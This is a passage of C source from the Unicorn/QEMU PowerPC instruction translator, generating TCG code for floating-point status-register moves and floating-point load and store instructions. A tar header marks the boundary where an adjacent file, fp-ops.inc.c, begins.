we pretend we can only do IEEE floating-point computations */ if (likely(crb != FPSCR_FEX && crb != FPSCR_VX && crb != FPSCR_NI)) { TCGv_i32 t0; t0 = tcg_const_i32(tcg_ctx, crb); gen_helper_fpscr_setbit(tcg_ctx, tcg_ctx->cpu_env, t0); tcg_temp_free_i32(tcg_ctx, t0); } if (unlikely(Rc(ctx->opcode) != 0)) { tcg_gen_trunc_tl_i32(tcg_ctx, cpu_crf[1], cpu_fpscr); tcg_gen_shri_i32(tcg_ctx, cpu_crf[1], cpu_crf[1], FPSCR_OX); } /* We can raise a deferred exception */ gen_helper_float_check_status(tcg_ctx, tcg_ctx->cpu_env); } /* mtfsf */ static void gen_mtfsf(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0; TCGv_i64 t1; int flm, l, w; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } flm = FPFLM(ctx->opcode); l = FPL(ctx->opcode); w = FPW(ctx->opcode); if (unlikely(w & !(ctx->insns_flags2 & PPC2_ISA205))) { gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); return; } gen_reset_fpstatus(tcg_ctx); if (l) { t0 = tcg_const_i32(tcg_ctx, (ctx->insns_flags2 & PPC2_ISA205) ? 0xffff : 0xff); } else { t0 = tcg_const_i32(tcg_ctx, flm << (w * 8)); } t1 = tcg_temp_new_i64(tcg_ctx); get_fpr(tcg_ctx, t1, rB(ctx->opcode)); gen_helper_store_fpscr(tcg_ctx, tcg_ctx->cpu_env, t1, t0); tcg_temp_free_i32(tcg_ctx, t0); if (unlikely(Rc(ctx->opcode) != 0)) { tcg_gen_trunc_tl_i32(tcg_ctx, cpu_crf[1], cpu_fpscr); tcg_gen_shri_i32(tcg_ctx, cpu_crf[1], cpu_crf[1], FPSCR_OX); } /* We can raise a deferred exception */ gen_helper_float_check_status(tcg_ctx, tcg_ctx->cpu_env); tcg_temp_free_i64(tcg_ctx, t1); } /* mtfsfi */ static void gen_mtfsfi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int bf, sh, w; TCGv_i64 t0; TCGv_i32 t1; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } w = FPW(ctx->opcode); bf = FPBF(ctx->opcode); if (unlikely(w & !(ctx->insns_flags2 & PPC2_ISA205))) { gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); return; } sh = (8 * w) + 7 - bf; gen_reset_fpstatus(tcg_ctx); t0 = tcg_const_i64(tcg_ctx, ((uint64_t)FPIMM(ctx->opcode)) << (4 * sh)); t1 = tcg_const_i32(tcg_ctx, 1 << sh); gen_helper_store_fpscr(tcg_ctx, tcg_ctx->cpu_env, t0, t1); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { tcg_gen_trunc_tl_i32(tcg_ctx, cpu_crf[1], cpu_fpscr); tcg_gen_shri_i32(tcg_ctx, cpu_crf[1], cpu_crf[1], FPSCR_OX); } /* We can raise a deferred exception */ gen_helper_float_check_status(tcg_ctx, tcg_ctx->cpu_env); } /*** Floating-point load ***/ #define GEN_LDF(name, ldop, opc, type) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ TCGv_i64 t0; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ gen_set_access_type(ctx, ACCESS_FLOAT); \ EA = tcg_temp_new(tcg_ctx); \ t0 = tcg_temp_new_i64(tcg_ctx); \ gen_addr_imm_index(ctx, EA, 0); \ gen_qemu_##ldop(ctx, t0, EA); \ set_fpr(tcg_ctx, rD(ctx->opcode), t0); \ tcg_temp_free(tcg_ctx, EA); \ tcg_temp_free_i64(tcg_ctx, t0); \ } #define GEN_LDUF(name, ldop, opc, type) \ static void glue(gen_, name##u)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ TCGv_i64 t0; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ if (unlikely(rA(ctx->opcode) == 0)) { \ gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); \ return; \ } \ gen_set_access_type(ctx, ACCESS_FLOAT); \ EA = tcg_temp_new(tcg_ctx); \ t0 = tcg_temp_new_i64(tcg_ctx); \ gen_addr_imm_index(ctx, EA, 0); \ gen_qemu_##ldop(ctx, t0, EA); \ set_fpr(tcg_ctx, rD(ctx->opcode), t0); \ tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], EA); \ tcg_temp_free(tcg_ctx, EA); \ tcg_temp_free_i64(tcg_ctx, t0); \ } #define GEN_LDUXF(name, ldop, opc, type) \ static void glue(gen_, name##ux)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ TCGv_i64 t0; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ t0 = tcg_temp_new_i64(tcg_ctx); \ if (unlikely(rA(ctx->opcode) == 0)) { \ gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); \ return; \ } \ gen_set_access_type(ctx, ACCESS_FLOAT); \ EA = tcg_temp_new(tcg_ctx); \ gen_addr_reg_index(ctx, EA); \ gen_qemu_##ldop(ctx, t0, EA); \ set_fpr(tcg_ctx, rD(ctx->opcode), t0); \ tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], EA); \ tcg_temp_free(tcg_ctx, EA); \ tcg_temp_free_i64(tcg_ctx, t0); \ } #define GEN_LDXF(name, ldop, opc2, opc3, type) \ static void glue(gen_, name##x)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ TCGv_i64 t0; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ gen_set_access_type(ctx, ACCESS_FLOAT); \ EA = tcg_temp_new(tcg_ctx); \ t0 = tcg_temp_new_i64(tcg_ctx); \ gen_addr_reg_index(ctx, EA); \ gen_qemu_##ldop(ctx, t0, EA); \ set_fpr(tcg_ctx, rD(ctx->opcode), t0); \ tcg_temp_free(tcg_ctx, EA); \ tcg_temp_free_i64(tcg_ctx, t0); \ } #define GEN_LDFS(name, ldop, op, type) \ GEN_LDF(name, ldop, op | 0x20, type); \ GEN_LDUF(name, ldop, op | 0x21, type); \ GEN_LDUXF(name, ldop, op | 0x01, type); \ GEN_LDXF(name, ldop, 0x17, op | 0x00, type) static void gen_qemu_ld32fs(DisasContext *ctx, TCGv_i64 dest, TCGv addr) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_qemu_ld_i32(tcg_ctx, tmp, addr, ctx->mem_idx, DEF_MEMOP(MO_UL)); gen_helper_todouble(tcg_ctx, dest, tmp); tcg_temp_free_i32(tcg_ctx, tmp); } /* lfd lfdu lfdux lfdx */ GEN_LDFS(lfd, ld64_i64, 0x12, PPC_FLOAT); /* lfs lfsu lfsux lfsx */ GEN_LDFS(lfs, ld32fs, 0x10, PPC_FLOAT); /* lfdepx (external PID lfdx) */ static void gen_lfdepx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv EA; TCGv_i64 t0; CHK_SV; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } gen_set_access_type(ctx, ACCESS_FLOAT); EA = tcg_temp_new(tcg_ctx); t0 = tcg_temp_new_i64(tcg_ctx); gen_addr_reg_index(ctx, EA); tcg_gen_qemu_ld_i64(tcg_ctx, t0, EA, PPC_TLB_EPID_LOAD, DEF_MEMOP(MO_Q)); set_fpr(tcg_ctx, rD(ctx->opcode), t0); tcg_temp_free(tcg_ctx, EA); tcg_temp_free_i64(tcg_ctx, t0); } /* lfdp */ static void gen_lfdp(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv EA; TCGv_i64 t0; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } gen_set_access_type(ctx, ACCESS_FLOAT); EA = tcg_temp_new(tcg_ctx); gen_addr_imm_index(ctx, EA, 0); t0 = tcg_temp_new_i64(tcg_ctx); /* * We only need to swap high and low halves. gen_qemu_ld64_i64 * does necessary 64-bit byteswap already. */ if (unlikely(ctx->le_mode)) { gen_qemu_ld64_i64(ctx, t0, EA); set_fpr(tcg_ctx, rD(ctx->opcode) + 1, t0); tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); gen_qemu_ld64_i64(ctx, t0, EA); set_fpr(tcg_ctx, rD(ctx->opcode), t0); } else { gen_qemu_ld64_i64(ctx, t0, EA); set_fpr(tcg_ctx, rD(ctx->opcode), t0); tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); gen_qemu_ld64_i64(ctx, t0, EA); set_fpr(tcg_ctx, rD(ctx->opcode) + 1, t0); } tcg_temp_free(tcg_ctx, EA); tcg_temp_free_i64(tcg_ctx, t0); } /* lfdpx */ static void gen_lfdpx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv EA; TCGv_i64 t0; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } gen_set_access_type(ctx, ACCESS_FLOAT); EA = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, EA); t0 = tcg_temp_new_i64(tcg_ctx); /* * We only need to swap high and low halves. gen_qemu_ld64_i64 * does necessary 64-bit byteswap already. */ if (unlikely(ctx->le_mode)) { gen_qemu_ld64_i64(ctx, t0, EA); set_fpr(tcg_ctx, rD(ctx->opcode) + 1, t0); tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); gen_qemu_ld64_i64(ctx, t0, EA); set_fpr(tcg_ctx, rD(ctx->opcode), t0); } else { gen_qemu_ld64_i64(ctx, t0, EA); set_fpr(tcg_ctx, rD(ctx->opcode), t0); tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); gen_qemu_ld64_i64(ctx, t0, EA); set_fpr(tcg_ctx, rD(ctx->opcode) + 1, t0); } tcg_temp_free(tcg_ctx, EA); tcg_temp_free_i64(tcg_ctx, t0); } /* lfiwax */ static void gen_lfiwax(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv EA; TCGv t0; TCGv_i64 t1; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } gen_set_access_type(ctx, ACCESS_FLOAT); EA = tcg_temp_new(tcg_ctx); t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); gen_addr_reg_index(ctx, EA); gen_qemu_ld32s(ctx, t0, EA); tcg_gen_ext_tl_i64(tcg_ctx, t1, t0); set_fpr(tcg_ctx, rD(ctx->opcode), t1); tcg_temp_free(tcg_ctx, EA); tcg_temp_free(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } /* lfiwzx */ static void gen_lfiwzx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv EA; TCGv_i64 t0; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } gen_set_access_type(ctx, ACCESS_FLOAT); EA = tcg_temp_new(tcg_ctx); t0 = tcg_temp_new_i64(tcg_ctx); gen_addr_reg_index(ctx, EA); gen_qemu_ld32u_i64(ctx, t0, EA); set_fpr(tcg_ctx, rD(ctx->opcode), t0); tcg_temp_free(tcg_ctx, EA); tcg_temp_free_i64(tcg_ctx, t0); } /*** Floating-point store ***/ #define GEN_STF(name, stop, opc, type) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ TCGv_i64 t0; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ gen_set_access_type(ctx, ACCESS_FLOAT); \ EA = tcg_temp_new(tcg_ctx); \ t0 = tcg_temp_new_i64(tcg_ctx); \ gen_addr_imm_index(ctx, EA, 0); \ get_fpr(tcg_ctx, t0, rS(ctx->opcode)); \ gen_qemu_##stop(ctx, t0, EA); \ tcg_temp_free(tcg_ctx, EA); \ tcg_temp_free_i64(tcg_ctx, t0); \ } #define GEN_STUF(name, stop, opc, type) \ static void glue(gen_, name##u)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ TCGv_i64 t0; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ if (unlikely(rA(ctx->opcode) == 0)) { \ gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); \ return; \ } \ gen_set_access_type(ctx, ACCESS_FLOAT); \ EA = tcg_temp_new(tcg_ctx); \ t0 = tcg_temp_new_i64(tcg_ctx); \ gen_addr_imm_index(ctx, EA, 0); \ get_fpr(tcg_ctx, t0, rS(ctx->opcode)); \ gen_qemu_##stop(ctx, t0, EA); \ tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], EA); \ tcg_temp_free(tcg_ctx, EA); \ tcg_temp_free_i64(tcg_ctx, t0); \ } #define GEN_STUXF(name, stop, opc, type) \ static void glue(gen_, name##ux)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ TCGv_i64 t0; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ if (unlikely(rA(ctx->opcode) == 0)) { \ gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); \ return; \ } \ gen_set_access_type(ctx, ACCESS_FLOAT); \ EA = tcg_temp_new(tcg_ctx); \ t0 = tcg_temp_new_i64(tcg_ctx); \ gen_addr_reg_index(ctx, EA); \ get_fpr(tcg_ctx, t0, rS(ctx->opcode)); \ gen_qemu_##stop(ctx, t0, EA); \ tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], EA); \ tcg_temp_free(tcg_ctx, EA); \ tcg_temp_free_i64(tcg_ctx, t0); \ } #define GEN_STXF(name, stop, opc2, opc3, type) \ static void glue(gen_, name##x)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ TCGv_i64 t0; \ if (unlikely(!ctx->fpu_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_FPU); \ return; \ } \ gen_set_access_type(ctx, ACCESS_FLOAT); \ EA = tcg_temp_new(tcg_ctx); \ t0 = tcg_temp_new_i64(tcg_ctx); \ gen_addr_reg_index(ctx, EA); \ get_fpr(tcg_ctx, t0, rS(ctx->opcode)); \ gen_qemu_##stop(ctx, t0, EA); \ tcg_temp_free(tcg_ctx, EA); \ tcg_temp_free_i64(tcg_ctx, t0); \ } #define GEN_STFS(name, stop, op, type) \ GEN_STF(name, stop, op | 0x20, type); \ GEN_STUF(name, stop, op | 0x21, type); \ GEN_STUXF(name, stop, op | 0x01, type); \ GEN_STXF(name, stop, 0x17, op | 0x00, type) static void gen_qemu_st32fs(DisasContext *ctx, TCGv_i64 src, TCGv addr) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); gen_helper_tosingle(tcg_ctx, tmp, src); tcg_gen_qemu_st_i32(tcg_ctx, tmp, addr, ctx->mem_idx, DEF_MEMOP(MO_UL)); tcg_temp_free_i32(tcg_ctx, tmp); } /* stfd stfdu stfdux stfdx */ GEN_STFS(stfd, st64_i64, 0x16, PPC_FLOAT); /* stfs stfsu stfsux stfsx */ GEN_STFS(stfs, st32fs, 0x14, PPC_FLOAT); /* stfdepx (external PID lfdx) */ static void gen_stfdepx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv EA; TCGv_i64 t0; CHK_SV; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } gen_set_access_type(ctx, ACCESS_FLOAT); EA = tcg_temp_new(tcg_ctx); t0 = tcg_temp_new_i64(tcg_ctx); gen_addr_reg_index(ctx, EA); get_fpr(tcg_ctx, t0, rD(ctx->opcode)); tcg_gen_qemu_st_i64(tcg_ctx, t0, EA, PPC_TLB_EPID_STORE, DEF_MEMOP(MO_Q)); tcg_temp_free(tcg_ctx, EA); tcg_temp_free_i64(tcg_ctx, t0); } /* stfdp */ static void gen_stfdp(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv EA; TCGv_i64 t0; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } gen_set_access_type(ctx, ACCESS_FLOAT); EA = tcg_temp_new(tcg_ctx); t0 = tcg_temp_new_i64(tcg_ctx); gen_addr_imm_index(ctx, EA, 0); /* * We only need to swap high and low halves. gen_qemu_st64_i64 * does necessary 64-bit byteswap already. */ if (unlikely(ctx->le_mode)) { get_fpr(tcg_ctx, t0, rD(ctx->opcode) + 1); gen_qemu_st64_i64(ctx, t0, EA); tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); get_fpr(tcg_ctx, t0, rD(ctx->opcode)); gen_qemu_st64_i64(ctx, t0, EA); } else { get_fpr(tcg_ctx, t0, rD(ctx->opcode)); gen_qemu_st64_i64(ctx, t0, EA); tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); get_fpr(tcg_ctx, t0, rD(ctx->opcode) + 1); gen_qemu_st64_i64(ctx, t0, EA); } tcg_temp_free(tcg_ctx, EA); tcg_temp_free_i64(tcg_ctx, t0); } /* stfdpx */ static void gen_stfdpx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv EA; TCGv_i64 t0; if (unlikely(!ctx->fpu_enabled)) { gen_exception(ctx, POWERPC_EXCP_FPU); return; } gen_set_access_type(ctx, ACCESS_FLOAT); EA = tcg_temp_new(tcg_ctx); t0 = tcg_temp_new_i64(tcg_ctx); gen_addr_reg_index(ctx, EA); /* * We only need to swap high and low halves. gen_qemu_st64_i64 * does necessary 64-bit byteswap already. */ if (unlikely(ctx->le_mode)) { get_fpr(tcg_ctx, t0, rD(ctx->opcode) + 1); gen_qemu_st64_i64(ctx, t0, EA); tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); get_fpr(tcg_ctx, t0, rD(ctx->opcode)); gen_qemu_st64_i64(ctx, t0, EA); } else { get_fpr(tcg_ctx, t0, rD(ctx->opcode)); gen_qemu_st64_i64(ctx, t0, EA); tcg_gen_addi_tl(tcg_ctx, EA, EA, 8); get_fpr(tcg_ctx, t0, rD(ctx->opcode) + 1); gen_qemu_st64_i64(ctx, t0, EA); } tcg_temp_free(tcg_ctx, EA); tcg_temp_free_i64(tcg_ctx, t0); } /* Optional: */ static inline void gen_qemu_st32fiw(DisasContext *ctx, TCGv_i64 arg1, TCGv arg2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); tcg_gen_trunc_i64_tl(tcg_ctx, t0, arg1), gen_qemu_st32(ctx, t0, arg2); tcg_temp_free(tcg_ctx, t0); } /* stfiwx */ GEN_STXF(stfiw, st32fiw, 0x17, 0x1E, PPC_FLOAT_STFIWX); /* POWER2 specific instructions */ /* Quad manipulation (load/store two floats at a time) */ /* lfq */ static void gen_lfq(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int rd = rD(ctx->opcode); TCGv t0; TCGv_i64 t1; gen_set_access_type(ctx, ACCESS_FLOAT); t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); gen_addr_imm_index(ctx, t0, 0); gen_qemu_ld64_i64(ctx, t1, t0); set_fpr(tcg_ctx, rd, t1); gen_addr_add(ctx, t0, t0, 8); gen_qemu_ld64_i64(ctx, t1, t0); set_fpr(tcg_ctx, (rd + 1) % 32, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } /* lfqu */ static void gen_lfqu(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int ra = rA(ctx->opcode); int rd = rD(ctx->opcode); TCGv t0, t1; TCGv_i64 t2; gen_set_access_type(ctx, ACCESS_FLOAT); t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); t2 = tcg_temp_new_i64(tcg_ctx); gen_addr_imm_index(ctx, t0, 0); gen_qemu_ld64_i64(ctx, t2, t0); set_fpr(tcg_ctx, rd, t2); gen_addr_add(ctx, t1, t0, 8); gen_qemu_ld64_i64(ctx, t2, t1); set_fpr(tcg_ctx, (rd + 1) % 32, t2); if (ra != 0) { tcg_gen_mov_tl(tcg_ctx, cpu_gpr[ra], t0); } tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); } /* lfqux */ static void gen_lfqux(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int ra = rA(ctx->opcode); int rd = rD(ctx->opcode); gen_set_access_type(ctx, ACCESS_FLOAT); TCGv t0, t1; TCGv_i64 t2; t2 = tcg_temp_new_i64(tcg_ctx); t0 = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, t0); gen_qemu_ld64_i64(ctx, t2, t0); set_fpr(tcg_ctx, rd, t2); t1 = tcg_temp_new(tcg_ctx); gen_addr_add(ctx, t1, t0, 8); gen_qemu_ld64_i64(ctx, t2, t1); set_fpr(tcg_ctx, (rd + 1) % 32, t2); tcg_temp_free(tcg_ctx, t1); if (ra != 0) { tcg_gen_mov_tl(tcg_ctx, cpu_gpr[ra], t0); } tcg_temp_free(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t2); } /* lfqx */ static void gen_lfqx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int rd = rD(ctx->opcode); TCGv t0; TCGv_i64 t1; gen_set_access_type(ctx, ACCESS_FLOAT); t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); gen_addr_reg_index(ctx, t0); gen_qemu_ld64_i64(ctx, t1, t0); set_fpr(tcg_ctx, rd, t1); gen_addr_add(ctx, t0, t0, 8); gen_qemu_ld64_i64(ctx, t1, t0); set_fpr(tcg_ctx, (rd + 1) % 32, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } /* stfq */ static void gen_stfq(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int rd = rD(ctx->opcode); TCGv t0; TCGv_i64 t1; gen_set_access_type(ctx, ACCESS_FLOAT); t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); gen_addr_imm_index(ctx, t0, 0); get_fpr(tcg_ctx, t1, rd); gen_qemu_st64_i64(ctx, t1, t0); gen_addr_add(ctx, t0, t0, 8); get_fpr(tcg_ctx, t1, (rd + 1) % 32); gen_qemu_st64_i64(ctx, t1, t0); tcg_temp_free(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } /* stfqu */ static void gen_stfqu(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int ra = rA(ctx->opcode); int rd = rD(ctx->opcode); TCGv t0, t1; TCGv_i64 t2; gen_set_access_type(ctx, ACCESS_FLOAT); t2 = tcg_temp_new_i64(tcg_ctx); t0 = tcg_temp_new(tcg_ctx); gen_addr_imm_index(ctx, t0, 0); get_fpr(tcg_ctx, t2, rd); gen_qemu_st64_i64(ctx, t2, t0); t1 = tcg_temp_new(tcg_ctx); gen_addr_add(ctx, t1, t0, 8); get_fpr(tcg_ctx, t2, (rd + 1) % 32); gen_qemu_st64_i64(ctx, t2, t1); tcg_temp_free(tcg_ctx, t1); if (ra != 0) { tcg_gen_mov_tl(tcg_ctx, cpu_gpr[ra], t0); } tcg_temp_free(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t2); } /* stfqux */ static void gen_stfqux(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int ra = rA(ctx->opcode); int rd = rD(ctx->opcode); TCGv t0, t1; TCGv_i64 t2; gen_set_access_type(ctx, ACCESS_FLOAT); t2 = tcg_temp_new_i64(tcg_ctx); t0 = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, t0); get_fpr(tcg_ctx, t2, rd); gen_qemu_st64_i64(ctx, t2, t0); t1 = tcg_temp_new(tcg_ctx); gen_addr_add(ctx, t1, t0, 8); get_fpr(tcg_ctx, t2, (rd + 1) % 32); gen_qemu_st64_i64(ctx, t2, t1); tcg_temp_free(tcg_ctx, t1); if (ra != 0) { tcg_gen_mov_tl(tcg_ctx, cpu_gpr[ra], t0); } tcg_temp_free(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t2); } /* stfqx */ static void gen_stfqx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int rd = rD(ctx->opcode); TCGv t0; TCGv_i64 t1; gen_set_access_type(ctx, ACCESS_FLOAT); t1 = tcg_temp_new_i64(tcg_ctx); t0 = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, t0); get_fpr(tcg_ctx, t1, rd); gen_qemu_st64_i64(ctx, t1, t0); gen_addr_add(ctx, t0, t0, 8); get_fpr(tcg_ctx, t1, (rd + 1) % 32); gen_qemu_st64_i64(ctx, t1, t0); tcg_temp_free(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } #undef _GEN_FLOAT_ACB #undef GEN_FLOAT_ACB #undef _GEN_FLOAT_AB #undef GEN_FLOAT_AB #undef _GEN_FLOAT_AC #undef GEN_FLOAT_AC #undef GEN_FLOAT_B #undef GEN_FLOAT_BS #undef GEN_LDF #undef GEN_LDUF #undef GEN_LDUXF #undef GEN_LDXF #undef GEN_LDFS #undef GEN_STF #undef GEN_STUF #undef GEN_STUXF #undef GEN_STXF #undef GEN_STFS �������������unicorn-2.1.1/qemu/target/ppc/translate/fp-ops.inc.c������������������������������������������������0000664�0000000�0000000�00000016031�14675241067�0022341�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#define _GEN_FLOAT_ACB(name, op, op1, op2, isfloat, set_fprf, type) \ GEN_HANDLER(f##name, op1, op2, 0xFF, 0x00000000, type) #define GEN_FLOAT_ACB(name, op2, set_fprf, type) \ _GEN_FLOAT_ACB(name, name, 0x3F, op2, 0, set_fprf, type), \ _GEN_FLOAT_ACB(name##s, name, 0x3B, op2, 1, set_fprf, type) #define _GEN_FLOAT_AB(name, op, op1, op2, inval, isfloat, set_fprf, type) \ GEN_HANDLER(f##name, op1, op2, 0xFF, inval, type) #define GEN_FLOAT_AB(name, op2, inval, set_fprf, type) \ _GEN_FLOAT_AB(name, name, 0x3F, op2, inval, 0, set_fprf, type), \ _GEN_FLOAT_AB(name##s, name, 0x3B, op2, inval, 1, set_fprf, type) #define _GEN_FLOAT_AC(name, op, op1, op2, inval, isfloat, set_fprf, type) \ GEN_HANDLER(f##name, op1, op2, 0xFF, inval, type) #define GEN_FLOAT_AC(name, op2, inval, set_fprf, type) \ _GEN_FLOAT_AC(name, name, 0x3F, op2, inval, 0, set_fprf, type), \ _GEN_FLOAT_AC(name##s, name, 0x3B, op2, inval, 1, set_fprf, type) #define GEN_FLOAT_B(name, op2, op3, set_fprf, type) \ GEN_HANDLER(f##name, 0x3F, op2, op3, 0x001F0000, type) #define GEN_FLOAT_BS(name, op1, op2, set_fprf, type) \ GEN_HANDLER(f##name, op1, op2, 0xFF, 0x001F07C0, type) GEN_FLOAT_AB(add, 0x15, 0x000007C0, 1, PPC_FLOAT), GEN_FLOAT_AB(div, 0x12, 0x000007C0, 1, PPC_FLOAT), GEN_FLOAT_AC(mul, 0x19, 0x0000F800, 1, PPC_FLOAT), GEN_FLOAT_BS(re, 0x3F, 0x18, 1, PPC_FLOAT_EXT), GEN_FLOAT_BS(res, 0x3B, 0x18, 1, PPC_FLOAT_FRES), GEN_FLOAT_BS(rsqrte, 0x3F, 0x1A, 1, PPC_FLOAT_FRSQRTE), _GEN_FLOAT_ACB(sel, sel, 0x3F, 0x17, 0, 0, PPC_FLOAT_FSEL), GEN_FLOAT_AB(sub, 0x14, 0x000007C0, 1, PPC_FLOAT), GEN_FLOAT_ACB(madd, 0x1D, 1, PPC_FLOAT), GEN_FLOAT_ACB(msub, 0x1C, 1, PPC_FLOAT), GEN_FLOAT_ACB(nmadd, 0x1F, 1, PPC_FLOAT), GEN_FLOAT_ACB(nmsub, 0x1E, 1, PPC_FLOAT), GEN_HANDLER_E(ftdiv, 0x3F, 0x00, 0x04, 1, PPC_NONE, PPC2_FP_TST_ISA206), GEN_HANDLER_E(ftsqrt, 0x3F, 0x00, 0x05, 1, PPC_NONE, PPC2_FP_TST_ISA206), GEN_FLOAT_B(ctiw, 0x0E, 0x00, 0, PPC_FLOAT), GEN_HANDLER_E(fctiwu, 0x3F, 0x0E, 0x04, 0, PPC_NONE, PPC2_FP_CVT_ISA206), GEN_FLOAT_B(ctiwz, 0x0F, 